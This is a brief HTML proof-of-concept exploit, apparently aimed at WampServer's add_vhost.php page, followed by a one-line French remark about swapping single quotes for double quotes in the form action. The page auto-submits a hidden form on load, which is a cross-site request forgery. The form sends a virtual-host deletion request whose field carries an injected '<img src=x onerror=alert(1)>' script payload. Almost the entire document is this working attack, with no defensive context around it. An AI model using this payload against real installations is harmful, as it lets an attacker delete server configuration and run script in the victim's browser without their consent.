<html> <body onload="wamp_csrf.submit();"> <form action='http://localhost/add_vhost.php?lang=english' name="wamp_csrf" method="POST"> <input type="hidden" name="virtual_del[]" value=""><img src=x onerror=alert(1)>" /> <input type="hidden" name="vhostdelete" value="Suppress VirtualHost" /> </form> </body> </html>Attention action="[localhost] contient réellement action='http://localhost/add_vhost.php?lang=english' en remplaçant les simple quotes(') par des double quote("